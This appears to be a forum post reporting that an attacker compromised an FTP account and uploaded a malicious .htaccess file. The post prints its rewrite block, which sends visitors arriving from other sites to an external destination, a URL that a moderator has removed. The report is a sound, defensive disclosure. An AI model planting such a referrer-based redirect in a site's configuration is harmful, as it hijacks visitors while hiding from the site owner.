Hacker or bot coming from 82.98.160.195 compromised FTP account on one of our servers.
Uploaded .htaccess file containing:
# Begin redirect block #
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$[Removed][L,R]
</IfModule>
# End redirect block #
The intended redirect destination did not raise any issues in Norton Safe Web.
Entering url in red into browser caused redirect to another site.
Web master of http://kasiacleaningservice.com should be informed his blog has a hijack entry and the site being redirected to needs to be investigated better than I can.
[edit: Removed hijack per the Participation Guidelines and Terms of Service.]